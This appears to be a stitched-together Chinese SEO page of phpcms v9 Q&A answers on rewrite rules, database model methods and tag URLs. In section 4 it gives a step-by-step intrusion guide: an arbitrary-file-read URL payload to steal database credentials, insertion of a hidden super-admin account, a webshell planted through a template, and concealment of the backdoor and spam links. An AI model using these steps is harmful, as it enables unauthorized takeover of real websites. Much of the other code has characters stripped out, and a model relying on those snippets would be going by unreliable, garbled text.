今天给各位分享phpcms9渗透的知识,其中也会对php168cms漏洞进行解释,如果能碰巧解决你现在面临的问题,别忘了关注本站,现在开始吧!
本文目录一览:
- 1、phpcms V9最新版本,默认的浏览方式是动态的,我想做成全站静态浏览,生成静态页面,求助!
- 2、phpcms v9可以用来开发论坛系统吗?另外phpcms v9主要是以开发什么类型的网站为主?详细一点,谢谢……
- 3、求phpcms v9的数据库增删改查 是怎么实现的
- 4、服务器装什么软件 phpcms注入漏洞
- 5、如何修改phpcmsv9网站系统最新版本tag的伪静态设置
- 6、phpcms9只能访问主页 其它页不能访问 ,访问出现No permission resources这个是怎么回事,大师帮帮忙啊
1、phpcms V9最新版本,默认的浏览方式是动态的,我想做成全站静态浏览,生成静态页面,求助!
首先请下载以下附件: IIS Rewrite模块 附件:Rewrite.rar
其中httpd.ini为配置文件内容如下:
[ISAPI_Rewrite]
# 3600 = 1 hour
CacheClockRate 3600
RepeatLimit 32
# Protect httpd.ini and httpd.parse.errors files
# from accessing through HTTP
# Rewrite 系统规则请勿修改 PHPCMS3.0
RewriteRule ^(.*)/show-([0-9] )-([0-9] )\.html$ $1/show\.php\?itemid=$2page=$3
RewriteRule ^(.*)/list-([0-9] )-([0-9] )\.html$ $1/list\.php\?catid=$2page=$3
RewriteRule ^(.*)/show-([0-9] )\.html$ $1/show\.php\?specialid=$2
将其解压到任意目录,如: C:\Rewrite
打开控制面板治理工具IIS信息服务治理器网站您站点属性。在ISAPI筛选器项点击 添加, 筛选器名称填入Rewrite,可执行文件为C:\Rewrite\Rewrite.dll
2、phpcms v9可以用来开发论坛系统吗?另外phpcms v9主要是以开发什么类型的网站为主?详细一点,谢谢……
CMS是Content Management System的缩写,意为"内容管理系统",PHPCMS 即为PHP实现的内容管理系统,顾名思义就是做资讯类网站的,如果要做论坛的话楼主可以选择discuz。
3、求phpcms v9的数据库增删改查 是怎么实现的
phpcms v9是基于mvc模式开发的,所以我们按照其套路到模型层程序中去找就行。在/phpcms/model目录下存放着与数据表名称一致的模型成文件,随意打开一个,你会看到都继承了model这个类,那么找到它,路径:/phpcms/libs/classes/model.class.php。对于数据库的增删改查方法都在这里面了,列举如下:
insert() 增加数据、delete()删除指定条件数据、listinfo()读取支持翻页的多条数据、select()读取多条数据、update()更新数据。
当然,还有很多方法,以及各方法的传参各代表什么意义都有详细的注释看看就会明白的。
那么我们在控制器中应该如何引入一个数据表的model并对其进行数据操作呢,例如我在首页控制器中获取最近注册的10个会员账号信息,可以这么写:
$member_db = pc_base::load_model("members_model");
!--使用pc_base的load_model方法进行加载指定的数据表模型,感觉像TP3.2里的M()函数--
$member_list = $member_db-select(array('islock'=0),"*",10,"id desc");
!--使用对应的方法获取数据--
就演示到这里吧,如果有mvc架构基础应该一看就懂的,更多的关于phpcms的二次开发深入可以参考官方开发手册、代码中的注释说明以及iphpcms里的二次开发视频教程。
4、服务器装什么软件 phpcms注入漏洞
本文利用了PHPCMS V9的两个漏洞,一个是读取任意文件漏洞,另一个是模版运行php脚本漏洞。使用到的工具:Navicat for Mysql/IE浏览器(建议使用代理)/湛蓝v9代码包(包含文中使用到的所有文件、代码和木马)
1、放置data.txt以备在目标站点读取并在目标站点生成PHP木马脚本使用。
例如将data.txt放置在yun.baidu.com/j0192/data.txt
2、通过v9漏洞获取配置信息(请参阅:phpcms V9最新读取站点任意文件漏洞)。
/index.php?m=searchc=indexa=public_get_suggest_keywordurl=asdfq=../../phpsso_server/caches/configs/database.php
3、通过v9系统漏洞获取到的数据库信息远程登陆目标站点数据库,在v9_admin和v9_sso_admin表中添加账号
username字段:admn
password字段:10203d4623c1957d041818196ff9822a
encrypt 字段:bGV22e
issuper 字段: 1
4、通过数据库添加管理员账号后使用以下用户名密码在后台登陆,然后修改当前用户密码。
用户名:admn
密码:123456
5、ctrl+a复制write.php全部内容粘贴进v9默认模版下的footer.html保存,然后点击footer.html的可视化运行该模版中的脚本,到此时就完成在目标站点生成木马脚本。
6、打开ifeng.com/caches/caches_template/default/wap/data.class.php
用户名:admin
密码:admin
7、隐藏新增加的管理员。
通过木马脚本上传替换/phpcms/modules/admin/admin_manage.php(默认匹配%admn%),然后登陆目标站点后台查看管理员列表是否还有用户名为admn的超级管理员,如果没有则表明我们完成了新加管理员的隐藏。
8、隐藏新增加的关联链接
通过木马脚本上传替换/phpcms/modules/admin/keylink.php((默认匹配%skyhome%))
9、将目标网站的漏洞修复,以防其他黑客入侵。
通过木马脚本上传替换/phpcms/modules/search/index.php
防黑参考:
1、关闭数据库远程访问。
2、静态文件及附件等文件目录禁止执行权限。
3、脚本文件目录禁止写权限。
4、系统后台等重要目录限制IP访问。
5、及时关注开源系统官方补丁升级和乌云、sebug等漏洞发布平台,修复系统漏洞。
5、如何修改phpcmsv9网站系统最新版本tag的伪静态设置
1、添加url规则路径:
进入网站后台-扩展-url规则管理,添加一个新的url规则,如下所示:
url规则名称选择category,模块名称为内容模块。
url示例:tags-测试-1.html
url规则:tags-{$tag}-{$page}.html
如下图所示:
PS:添加完后我们要记住刚才我们添加规则的ID,将在下面有用。
2、在代码里写入url规则
打开phpcms/modules/content/tag.php文件,找到:
$infos = $keyword_data_db-listinfo($where, '`id` DESC', $page, $pagesize);
改为:
1.//add tag jincon
2.$urlrules = getcache("urlrules","commons");
3.$urlrule = $urlrules[31];//调用url规则
4.$infos = $keyword_data_db-listinfo($where, '`id` DESC',$page, $pagesize,"","9",$urlrule,array("tag"=urlencode($tag)));
这里的ID号31就是我们之前设置的。
3、修改内容页模版以及标签页模版里面相关的地方
打开phpcms\templates\default\content\show.html,找到:
{APP_PATH}index.php?m=contentc=taga=liststag={urlencode($keyword)}
改成
1.{APP_PATH}tag-{urlencode($keyword)}-1.html
打开phpcms\templates\default\content\tag.html,同样找到
{APP_PATH}index.php?m=contentc=taga=liststag={urlencode($keyword)}
改成
{APP_PATH}tag-{urlencode($keyword)}-1.html
4、前面我们把模块以及模版修改好了,接下来这是非常重要的一步了,这里要给tag标签加上规则了。
a、如果你是需要.htaccess规则,那么你可以自己建立一个记事本,添加如下代码然后把文件名的属性改为.htaccess。如果你的网站已经有这个文件,那么直接把这个文件下载下来在里面添加即可。
代码如下:
RewriteRule ^tag-(.*)-([0-9]+).html index.php?m=contentc=taga=liststag=$1page=$2
b、如果你是需要web.config规则,像上面a中一样的步骤添加如下代码即可。
代码如下:
rule name="rule 1l"
match url="^tag-(.*)-([0-9]+).html" /
action type="Rewrite" url="/index.php?m=contentamp;c=tagamp;a=listsamp;tag={R:1}amp;page={R:2}" /
/rule
好吧,以上就是关于如何修改phpcmsv9网站系统最新版本tag的伪静态的方法
6、phpcms9只能访问主页 其它页不能访问 ,访问出现No permission resources这个是怎么回事,大师帮帮忙啊
出现No permission resources 原因是因为phpcms设置了后台访问域名管理所造成的。
解决方法是修改 /caches/configs/system.php中的 admin_url 把设置过的域名删除即可刷新后台.
phpcms9渗透的介绍就聊到这里吧,感谢你花时间阅读本站内容,更多关于php168cms漏洞、phpcms9渗透的信息别忘了在本站进行查找喔。